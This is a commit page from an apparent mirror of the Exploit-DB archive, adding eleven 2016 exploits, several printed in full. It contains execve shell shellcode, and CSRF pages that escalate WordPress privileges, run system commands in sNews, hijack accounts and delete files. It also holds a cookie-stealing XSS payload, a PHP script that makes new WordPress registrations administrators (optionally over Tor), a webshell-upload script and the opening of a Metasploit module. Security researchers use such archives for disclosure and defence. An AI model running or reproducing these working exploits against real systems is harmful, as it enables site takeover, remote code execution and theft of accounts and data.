bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-06-21

Browse source 
11 new exploits

Linux Kernel 2.2. / 2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability
Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability
WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation
Linux x86_64 execve Shellcode - 15 bytes
sNews CMS 1.7.1 - Multiple Vulnerabilities
Joomla BT Media (com_bt_media) Component - SQL Injection
Premium SEO Pack 1.9.1.3 - wp_options Overwrite
Windows XP - 10 - Download & Execute Shellcode
Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf)
Airia - (Add Content) CSRF
Airia - Webshell Upload Exploit
Symphony CMS 2.6.7 - Session Fixation
ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation
This commit is contained in:
Offensive Security 2016-06-21 05:03:48 +00:00
parent eb4f2190bb
commit da158cde92
13 changed files with 1131 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
files.csv
View file

@ -20050,7 +20050,7 @@ id,file,description,date,author,platform,type,port
22810,platforms/php/webapps/22810.txt,"pMachine 1.0/2.x Search Module Cross-Site Scripting Vulnerability",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0
22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 Command-Line Argument Buffer Overflow Vulnerability",2003-06-19,Matrix_DK,bsd,local,0
22812,platforms/php/webapps/22812.txt,"WebJeff Filemanager 1.6 File Disclosure Vulnerability",2003-06-20,"Adam Stephens",php,webapps,0
22813,platforms/linux/local/22813.c,"Linux Kernel 2.2. / 2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability",2003-06-20,IhaQueR,linux,local,0
22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability",2003-06-20,IhaQueR,linux,local,0
22814,platforms/linux/dos/22814.txt,"GNU GNATS 3.0 02 PR-Edit Command Line Option Heap Corruption Vulnerablity",2003-06-21,"dong-h0un U",linux,dos,0
22815,platforms/linux/local/22815.c,"GNU GNATS 3.113 Environment Variable Buffer Overflow Vulnerability",2003-06-21,Xpl017Elz,linux,local,0
22816,platforms/windows/dos/22816.txt,"Symantec Security Check RuFSI ActiveX Control Buffer Overflow Vulnerability",2003-06-23,"Cesar Cerrudo",windows,dos,0
@ -36156,3 +36156,14 @@ id,file,description,date,author,platform,type,port
39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Shell Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
39973,platforms/linux/remote/39973.rb,"op5 v7.1.9 Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
39975,platforms/lin_x86-64/shellcode/39975.c,"Linux x86_64 execve Shellcode - 15 bytes",2016-06-20,CripSlick,lin_x86-64,shellcode,0
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
39979,platforms/windows/shellcode/39979.c,"Windows XP - 10 - Download & Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0
39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf)",2016-06-20,s0nk3y,windows,local,0
39981,platforms/php/webapps/39981.html,"Airia - (Add Content) CSRF",2016-06-20,HaHwul,php,webapps,80
39982,platforms/php/webapps/39982.rb,"Airia - Webshell Upload Exploit",2016-06-20,HaHwul,php,webapps,80
39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80
39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0

Can't render this file because it is too large.

48
platforms/lin_x86-64/shellcode/39975.c Executable file
View file

@ -0,0 +1,48 @@
#include<stdio.h>
#include<string.h>
// OS-20614
// eben_s_dowling@georgiasouthern.edu
/*
global _start
_start:
execve:
mov rsi, rax
mov rdx, rsi
mov r12 , 0x68732f6e69622f
push r12
push rsp
pop rdi
mov al, 0x3b
syscall
*/
unsigned char code[] = \
"\x48\x89\xc6" // mov %rax,%rsi
"\x48\x89\xf2" // mov %rsi,%rdx
"\x49\xbc\x2f\x62\x69\x6e\x2f" // movabs $0x68732f6e69622f,%r12
"\x73\x68\x00"
"\x41\x54" // push %r12
"\x54" // push %rsp
"\x5f" // pop %rdi
"\xb0\x3b" // mov $0x3b,%al
"\x0f\x05" // syscall
;
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

3
platforms/linux/local/22813.c
View file

@ -1,6 +1,7 @@
source: http://www.securityfocus.com/bid/8002/info
/* source: http://www.securityfocus.com/bid/8002/info
A potential information disclosure vulnerability has been reported for the Linux /proc filesystem, specifically when invoking setuid applications. As a result, an unprivileged user may be able to read the contents of a setuid application's environment data. This could potentially, although unlikely, result in the disclosure of sensitive information, such as restricted file path information.
*/
/****************************************************************
* *

114
platforms/php/webapps/39974.html Executable file
View file

@ -0,0 +1,114 @@
<!--
# Exploit Title: Wordpress Ultimate-Product-Catalog <=3.8.1 Privilege escalation
# Date: 2016-06-17
# Google Dork: Index of /wp-content/plugins/ultimate-product-catalogue/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://www.etoilewebdesign.com
# plugin uri: http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/
# Software Link:
# Version: 3.8.1
# Tested on: windows 7 + Mozilla firefox.
# Demo: https://www.youtube.com/watch?v=m_qMZ2wIQPI
====================
DESCRIPTION
====================
In a recent security research, a privilege scalation web vulnerability has been detected in the WordPress Ultimate Product Catalogue Plugin <=v3.8.1.
The vulnerability allows remote attackers to take over control of the Ultimate Product Catalogue Plugin administration page if the plugin ispremium version and the remote attacker have an especific account (contributor|editor|author).
The privilege scalation web vulnerability is located in the <upc-plugin-path>/Functions/Update_Admin-Databases.php` file.
Remote attackers are able to request crafted data of the POST method request with the vulnerable ´acces_role´ parameter.
The security risk of the privilege scalation web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.
Exploitation of the privilege scalation vulnerability requires low user interaction and low privilege web-application user account.
Successful exploitation of the privilege scalation web vulnerability results in web aplication compromise.
For security demostration I made a prof of concept to show the vulnerability logged in as a contributor user.
==============
POC (html)
==============
-->
<html>
<body>
<script>
function submitRequest()
{
var access_role = "contributor"; //this is my type of profile (contributor|editor|author) to full admin acces!!
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/wordpress/wp-admin/admin-ajax.php?action=UPCP-options&Action=UPCP_UpdateOptions", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Accept-Language", "es-ES,es;q=0.8");
xhr.withCredentials = true;
var body = "color_scheme=Blue&product_links=Same&read_more=Yes&desc_count=240&sidebar_order=Normal&Details_Image=http%3A%2F%2F&filter_type=AJAX&case_insensitive_search=Yes&tag_logic=AND&product_search=name&contents_filter=Yes&maintain_filtering=Yes&Socialmedia%5B%5D=Blank&custom_product_page=No&product_inquiry_form=No&product_reviews=No&lightbox=No&products_per_page=1000000&pagination_location=Top&product_sort=Price_Name&cf_converion=No&access_role="+access_role
+"&pretty_links=No&xml_sitemap_url=&seo_option=None&seo_integration=Add&seo_title=%5Bpage-title%5D+%7C+%5Bproduct-name%5D&categories_label=&subcategories_label=&tags_label=&custom_fields_label=&sort_by_label=&price_ascending_label=&price_descending_label=&name_ascending_label=&name_descending_label=&product_name_search_label=&product_name_text_label=&details_label=&back_to_catalogue=&no_results_found_label=&products_pagination_label=&product_details_label=&additional_info_label=&contact_us_label=&related_products_label=&next_product_label=&previous_product_label=&Options_Submit=Save+Changes";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="I want more privileges!!" onclick="submitRequest();" />
</form>
</body>
</html>
<!--
================
Vulnerable code
================
located in <upc-plugin-path>/Functions/Update_Admin-Databases.php` file
function Update_UPCP_Options() {
global $Full_Version;
$InstallVersion = get_option("UPCP_First_Install_Version");
...
if ($Full_Version == "Yes" and isset($_POST['access_role'])) {update_option("UPCP_Access_Role", $_POST['access_role']);}
...
$update = __("Options have been succesfully updated.", 'UPCP');
return $update;
}
the function no check for capabilities...
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0akiN SEC-LABORATORY]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
============
REFERENCES
============
https://i0akinsec.wordpress.com/2016/06/17/wordpress-ultimate-product-catalog-3-8-1-privilege-escalation/
http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/
https://wordpress.org/plugins/ultimate-product-catalogue/
https://wordpress.org/plugins/ultimate-product-catalogue/changelog/
Note: The vulnerability can be exploited if the plugin is in full version.
An attacker without any account, but the administration menu item only appear when the attacker
account is contributor, editor or author. When the legitimate UPCP administrator want request the plugin administration page, it will
denegate his access.
==================================
time-line
2015-10-08: vulnerability found
2016-06-17: reported to vendor
2016-06-17: Vendor has realeased a new version (3.8.)
2016-06-18: Public disclousure
===================================
-->

227
platforms/php/webapps/39976.txt Executable file
View file

@ -0,0 +1,227 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SNEWS-RCE-CSRF-XSS.txt
[+] ISR: APPARITIONSEC
Vendor:
============
snewscms.com
Product:
================
sNews CMS v1.7.1
Vulnerability Type:
===================================
Persistent Remote Command Execution
Cross Site Request Forgeries (CSRF)
Persistent XSS
CVE Reference:
==============
N/A
Vulnerability Details:
======================
If an authenticated user happens to stumble upon an attackers webpage or
click an infected link they have a chance to get the following prizes,
1) Persistent Remote Code Execution
2) Cross Site Request Forgeries
3) Persistent XSS
sNews has feature that allows PHP functions to be inserted for articles by
authenticated users under "Edit Article". However, there is no
CSRF token/checks to prevent unauthorized HTTP requests to be made on
behalf of that user. Furthermore, these commands will get stored in MySQL
database in the 'articles' table. So each time that sNews webpage is
visited it will execute.
e.g.
CSRF / RCE Under "Edit Article" Admin area.
[func]system:|:"calc.exe"[/func]
On line no 3270 of "snews.php" there is no input filtering allowing
arbitrary system calls.
$returned = call_user_func_array($func[0], explode(',',$func[1]));
////////////////////////////////////////////////////////////////////////////////////////////
CSRF / Hijack SNews CMS accounts, the username however must be known in
advance, if known then that lucky user wins a changed password!.
////////////////////////////////////////////////////////////////////////////////////////////
CSRF / arbitrary file deletion, we can delete arbitrary files in the
webroot which we can use to bypass access controls like ".htaccess" file.
allowing attackers to read/access files from those affected directories.
On line 3080 "snews.php" direct usage of untrusted user input into the PHP
"unlink" function which deletes any files the attacker wants.
if (isset($_GET['task']) == 'delete') {
$file_to_delete = $_GET['folder'].'/'.$_GET['file'];
@unlink($file_to_delete);
echo notification(0,'','snews_files');
///////////////////////////////////////////////////////////////////////////////////////////
Persistent XSS entry point also exists in same "Edit Article" Admin area,
but why bother when we have RCE option.
Exploit code(s):
===============
Remote Command Execution pop "calc.exe" POC.
<form id="CSRF_RCE_PRIZE" method="post" action="
http://localhost/snews1.7.1/?action=process&task=admin_article&id=2">
<input type="hidden" name="title" value="Remote Command Execution" />
<input type="hidden" name="seftitle" value="remote-command-execution" />
<input type="hidden" name="text" value='[func]system:|:"calc.exe"[/func]' />
<input type="hidden" name="define_category" value="1" />
<input type="hidden" name="show_on_home" value="on" />
<input type="hidden" name="publish_article" value="on" />
<input type="hidden" name="position" value="1" />
<input type="hidden" name="description_meta" value="" />
<input type="hidden" name="keywords_meta" value="" />
<input type="hidden" name="description_meta" value="on" />
<input type="hidden" name="display_title" value="on" />
<input type="hidden" name="display_info" value="on" />
<input type="hidden" name="fposting_day" value="3" />
<input type="hidden" name="fposting_month" value="6" />
<input type="hidden" name="fposting_year" value="2016" />
<input type="hidden" name="fposting_hour" value="6" />
<input type="hidden" name="fposting_minute" value="16" />
<input type="hidden" name="task" value="admin_article" />
<input type="hidden" name="edit_article" value="save" />
<input type="hidden" name="article_category" value="1" />
<input type="hidden" name="id" value="2" />
<script>document.getElementById('CSRF_RCE_PRIZE').submit()</script>
</form>
After we make HTTP request for the booby trapped article and KABOOM.
http://localhost/snews1.7.1/uncategorized/remote-command-execution/
CSRF - Account Hijack
=====================
<form id="CSRF-CHG-PASSWD-PRIZE" method="post" action="
http://localhost/snews1.7.1/?action=process&task=changeup">
<input type="hidden" name="uname" value="admin" />
<input type="hidden" name="pass1" value="PWN3D123" />
<input type="hidden" name="pass2" value='PWN3D123' />
<input type="hidden" name="task" value="changeup" />
<input type="hidden" name="submit_pass" value="Save" />
<script>document.getElementById('CSRF-CHG-PASSWD-PRIZE').submit()</script>
</form>
CSRF - Arbitrary File Deletion
===============================
1) Create file in htdocs / web root as a test e.g. "DELETEME.php"
2) Visit following URL as authenticated user.
http://localhost/snews1.7.1/?action=snews_files&task=delete&folder=Patches
Log&file=../../../DELETEME.php
3) Files gone!
Persistent XSS
===============
<form id="XSS" method="post" action="
http://localhost/snews1.7.1/?action=process&task=admin_article&id=2">
<input type="hidden" name="title" value="XSS" />
<input type="hidden" name="seftitle" value="XSS" />
<input type="hidden" name="text"
value="[include]<script>alert(document.cookie)</script>[/include]" />
<input type="hidden" name="define_category" value="1" />
<input type="hidden" name="show_on_home" value="on" />
<input type="hidden" name="publish_article" value="on" />
<input type="hidden" name="position" value="1" />
<input type="hidden" name="description_meta" value="" />
<input type="hidden" name="keywords_meta" value="" />
<input type="hidden" name="description_meta" value="on" />
<input type="hidden" name="display_title" value="on" />
<input type="hidden" name="display_info" value="on" />
<input type="hidden" name="fposting_day" value="3" />
<input type="hidden" name="fposting_month" value="6" />
<input type="hidden" name="fposting_year" value="2016" />
<input type="hidden" name="fposting_hour" value="6" />
<input type="hidden" name="fposting_minute" value="16" />
<input type="hidden" name="task" value="admin_article" />
<input type="hidden" name="edit_article" value="save" />
<input type="hidden" name="article_category" value="1" />
<input type="hidden" name="id" value="2" />
<script>document.getElementById('XSS').submit()</script>
</form>
Disclosure Timeline:
=================================
Vendor Notification: No Replies
June 19, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
Critical
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
Description:
================================================
Request Method(s): [+] GET / POST
Vulnerable Product: [+] snews v1.7.1
===========================================
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
by hyp3rlinx

26
platforms/php/webapps/39977.txt Executable file
View file

@ -0,0 +1,26 @@
######################
# Exploit Title : Joomla com_bt_media - SQL Injection
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/bt-media-gallery
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 1.0
# Date: 2016/06/19
######################
#
# PoC:
# categories[0]= Parameter Vulnerable To SQL
# Demo :
# http://server/index.php?option=com_bt_media&view=list&categories[0]=%277&Itemid=134
# Please Free Yaser Ebrahimi
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : persian-team.ir
######################

183
platforms/php/webapps/39978.php Executable file
View file

@ -0,0 +1,183 @@
<?php
/**
* Exploit Title: Premium SEO Pack Exploit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://aa-team.com/
* Software Link: http://codecanyon.net/item/premium-seo-pack-wordpress-plugin/6109437?s_rank=2
* Version: 1.9.1.3
* Tested on: Debian 8, PHP 5.6.17-3
* Type: Authenticated (customer, subscriber) wp_options overwrite
* Time line: Found [05-Jun-2016], Vendor notified [05-Jun-2016], Vendor fixed: [???], [RD:1]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:u:p:a:",array('tor:'));
echo "Current Options:\n";
print_r($options);
for($i=4;$i>0;$i--){
echo "Starting in $i \r";
sleep(1);
}
echo "Starting.... \r";
echo "\n";
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function logIn(){
global $curl, $options;
file_put_contents('cookies.txt',"\n");
$curl->setCookieFile('cookies.txt');
$curl->get($options['t']);
$data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
$curl->post($options['t'].'/wp-login.php', $data);
$status = $curl->getTransferInfo('http_code');
if ($status !== 302){
echo "Login probably failed, aborting...\n";
echo "Login response saved to login.html.\n";
die();
}
file_put_contents('login.html',$curl->getResponse());
}
function exploit(){
global $curl, $options;
if ($options['m'] == 'admin_on') {
echo "Setting default role on registration to Administrator\n";
/* Getting a nonce */
$data = array('action'=>'pspLoadSection', 'section'=>'setup_backup');
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
$resp = json_decode($resp,true);
preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat);
if (!isset($mat[1])){
die("Failed getting box_nonce\n");
}
$nonce = $mat[1][0];
$new_settings = array('default_role'=>'administrator', 'users_can_register'=>1);
$new_settings = urlencode(json_encode($new_settings));
echo "Sending settings to update\n";
$data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings);
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
$resp = json_decode($resp,true);
if (@$resp['status'] == 'ok'){
echo "Admin mode is ON, go ahead an register yourself an Admin account! \n";
} else {
echo "Setting admin mode failed \n";
}
echo "Raw response: " . $curl->getResponse() . "\n";
}
if ($options['m'] == 'admin_off') {
echo "Setting default role on registration to Subscriber\n";
/* Getting a nonce */
$data = array('action'=>'pspLoadSection', 'section'=>'setup_backup');
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
$resp = json_decode($resp,true);
preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat);
if (!isset($mat[1])){
die("Failed getting box_nonce\n");
}
$nonce = $mat[1][0];
$new_settings = array('default_role'=>'subscriber', 'users_can_register'=>0);
$new_settings = urlencode(json_encode($new_settings));
echo "Sending settings to update\n";
$data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings);
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
$resp = json_decode($resp,true);
if (@$resp['status'] == 'ok'){
echo "Admin mode is OFF \n";
}
echo "Raw response: " . $curl->getResponse() . "\n";
}
}
logIn();
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if ( !isset($options['u']) ){
return false;
}
if ( !isset($options['p']) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
if (!isset($options['m']) || !in_array($options['m'], array('admin_on','admin_off') ) ){
return false;
}
if ($options['m'] == 'tag' && !isset($options['a'])){
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Premium SEO Pack Exploit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE]
*** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
[MODE] admin_on - Sets default role on registration to Administrator
admin_off - Sets default role on registration to Subscriber
Examples:
php $argv[0] -t http://localhost/ --tor=yes -u customer1 -p password -m admin_on
php $argv[0] -t http://localhost/ --tor=yes -u customer1 -p password -m admin_off
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}

22
platforms/php/webapps/39981.html Executable file
View file

@ -0,0 +1,22 @@
<!--
# Exploit Title: Airia - CSRF Vulnerability(Add content)
# Date: 2016-06-20
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ytyng.com
# Software Link: https://github.com/ytyng/airia/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
-->
<form name="csrf_poc" action="http://127.0.0.1/vul_test/airia/editor.php" method="POST">
<input type="hidden" name="mode" value="save">
<input type="hidden" name="file" value="1">
<input type="hidden" name="scrollvalue" value="">
<input type="hidden" name="contents" value="CSRF Attack">
<input type="hidden" name="group" value="1">
<input type="submit" value="Replay!">
</form>
<script type="text/javascript">document.forms.csrf_poc.submit();</script>

70
platforms/php/webapps/39982.rb Executable file
View file

@ -0,0 +1,70 @@
# Exploit Title: Airia - Webshell Upload Vulnerability
# Date: 2016-06-20
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ytyng.com
# Software Link: https://github.com/ytyng/airia/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
require "net/http"
require "uri"
if ARGV.length !=2
puts "Airia Webshell Upload Exploit(Vulnerability)"
puts "Usage: #>ruby airia_ws_exploit.rb [targetURL] [phpCode]"
puts " targetURL(ex): http://127.0.0.1/vul_test/airia"
puts " phpCode(ex): echo 'zzzzz'"
puts " Example : ~~.rb http://127.0.0.1/vul_test/airia 'echo zzzz'"
puts " exploit & code by hahwul[www.hahwul.com]"
else
target_url = ARGV[0] # http://127.0.0.1/jmx2-Email-Tester/
shell = ARGV[1] # PHP Code
exp_url = target_url + "/editor.php"
uri = URI.parse(exp_url)
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Post.new(uri.request_uri)
request["Accept"] = "*/*"
request["User-Agent"] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
request["Connection"] = "close"
request["Referer"] = "http://127.0.0.1/vul_test/airia/editor.php?file=1&group=%281%20AND%20%28SELECT%20SLEEP%2830%29%29%29%20--%20"
request["Accept-Language"] = "en"
request["Content-Type"] = "application/x-www-form-urlencoded"
request.set_form_data({"mode"=>"save",""=>"","file"=>"shell.php","scrollvalue"=>"","contents"=>"<?php echo 'Airia Webshell Exploit';#{shell};?>","group"=>"vvv_html"})
response = http.request(request)
puts "[Result] Status code: "+response.code
puts "[Result] Open Browser: "+target_url+"/data/vvv_html/shell.php"
end
=begin
### Run Step.
#> ruby 3.rb http://127.0.0.1/vul_test/airia "echo 123;"
[Result] Status code: 302
[Result] Open Browser: http://127.0.0.1/vul_test/airia/data/vvv_html/shell.php
output: Airia Webshell Exploit123
### HTTP Request / Response
[Request]
POST /vul_test/airia/editor.php HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://127.0.0.1/vul_test/airia/editor.php?file=1&group=%281%20AND%20%28SELECT%20SLEEP%2830%29%29%29%20--%20
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; DBSR_session=01ltbc0gf3i35kkcf5f6o6hir1; __utma=96992031.1679083892.1466384142.1466384142.1466384142.1; __utmb=96992031.2.10.1466384142; __utmc=96992031; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
mode=save&file=1.php&scrollvalue=&contents=<?php echo "Attack OK."?>&group=vvv_html
[Response] Uloaded file
http://127.0.0.1/vul_test/airia/data/vvv_html/1.html
=end

145
platforms/php/webapps/39983.txt Executable file
View file

@ -0,0 +1,145 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SYMPHONY-CMS-SESSION-FIXATION.txt
[+] ISR: APPARITIONSEC
Vendor:
====================
www.getsymphony.com
Product:
==================
Symphony CMS v2.6.7
Download:
http://www.getsymphony.com/download/
Symphony is a XSLT-powered open source content management system.
Vulnerability Type:
===================
Session Fixation
CVE Reference:
==============
CVE-2016-4309
Vulnerability Details:
=====================
Symphony CMS is prone to "Session Fixation" allowing attackers to preset a
users PHPSESSID "Session Identifier".
If the application is deployed using an insecure setup with PHP.INI
"session.use_only_cookies" not enabled, attackers can then send
victims a link to the vulnerable application with the "PHPSESSID" already
initialized as Symphony does not use or call
"session_regenerate_id()" upon successful user authentication.
Note: as per php.net/manual/en/session.configuration.php
"session.use_only_cookies=1" is default since PHP 4.3.0.
e.g.
"http://localhost/symphony/?PHPSESSID=APPARITION666".
As Symphonys Session ID is not regenerated it can result in arbitrary
Session ID being 'Fixated' to a user, if that user authenticates using
this attacker supplied session fixated link, the attacker can now access
the affected application from a different Computer/Browser
and have the same level of access to that of the victim. Default Cookie
lifetime for Symphony CMS is up to two weeks.
Reproduction steps:
=====================
Edit PHP.INI and change following settings to 'session.use_only_cookies=0'
if applicable, as POC test.
1) Telnet localhost 80
2) make HTTP request with a prefixed PHPSESSID
GET /symphony-2.6.7/symphony/?PHPSESSID=PWN3D666 HTTP/1.1
Host: localhost
Connection: close
3) Hit enter twice
HTTP/1.1 200 OK
Date: Mon, 16 May 2016 02:06:47 GMT
Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1l PHP/5.6.8
X-Powered-By: PHP/5.6.8
Set-Cookie: PHPSESSID=PWNED666; expires=Mon, 30-May-2016 02:06:48 GMT;
Max-Age=1209600; path=/symphony-2.6.7; httponly
Content-Length: 1501
Connection: close
Content-Type: text/html; charset=UTF-8
Exploit code(s):
===============
1)
http://localhost/symphony-2.6.7/symphony/publish/articles/?PHPSESSID=hyp3rlinx
2) http://localhost/symphony-2.6.7/symphony/?PHPSESSID=APPARITION
Disclosure Timeline:
=====================================
Vendor Notification: May 3, 2016
Vendor Release Fix: May 23, 2016
June 20, 2016 : Public Disclosure.
Exploitation Method:
====================
Remote
Severity Level:
================
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
Description:
==============================================
Request Method(s): [+] GET / POST
Vulnerable Product: [+] Symphony CMS 2.6.7
Vulnerable Parameter(s): [+] 'PHPSESSID'
===============================================
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx

72
platforms/windows/local/39980.rb Executable file
View file

@ -0,0 +1,72 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Tomabo M3U SEH Based Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack over flow in Tomabo MP4 Player <= 3.11.6. When
the application is used to open a specially crafted m3u file, an buffer is overwritten allowing
for the execution of arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [
'yokoacc', # Proof of concept
'nudragn', # Proof of concept
'rungga_reksya', # Proof of concept
'rahmat_nurfauzi' # Metasploit module
],
'References' =>
[
[ 'EDB', '38486' ],
[ 'URL', 'http://www.tomabo.com/mp4-player/download.html'],
],
'DefaultOptions' =>
{
